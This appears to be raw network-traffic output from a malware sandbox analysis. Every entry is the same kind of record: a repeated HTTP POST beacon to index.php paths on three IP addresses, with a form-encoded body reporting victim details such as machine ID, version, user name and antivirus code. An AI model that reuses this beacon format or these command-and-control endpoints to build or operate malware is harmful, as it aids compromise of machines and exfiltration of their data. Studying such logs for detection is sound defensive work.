                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
